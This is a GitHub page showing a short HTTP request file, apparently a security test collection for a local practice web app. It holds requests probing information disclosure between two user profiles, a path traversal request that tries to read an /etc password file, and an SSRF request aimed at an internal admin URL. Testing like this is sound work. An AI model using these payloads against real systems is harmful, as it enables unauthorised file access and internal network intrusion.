-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsecurity.http
More file actions
36 lines (24 loc) · 812 Bytes
/
security.http
File metadata and controls
36 lines (24 loc) · 812 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Information Disclosure 1
### register 1
POST http://localhost:7000/register?userId=1&userName=aboba1
Content-Type: application/json
Accept: application/json
### register 2
POST http://localhost:7000/register?userId=2&userName=aboba2
Content-Type: application/json
Accept: application/json
### profile 1
GET http://localhost:7000/userProfile?userId=1
Content-Type: application/json
Accept: application/json
### profile 2
GET http://localhost:7000/userProfile?userId=2
Content-Type: application/json
Accept: application/json
### Path traversal + DDos
GET http://localhost:7000/exportReport?userId=1&filename=../../etc/password
Accept: application/json
### SSRF
POST http://localhost:7000/notify?userId=1&callbackUrl=http://localhost:8080/admin
Content-Type: application/json
Accept: application/json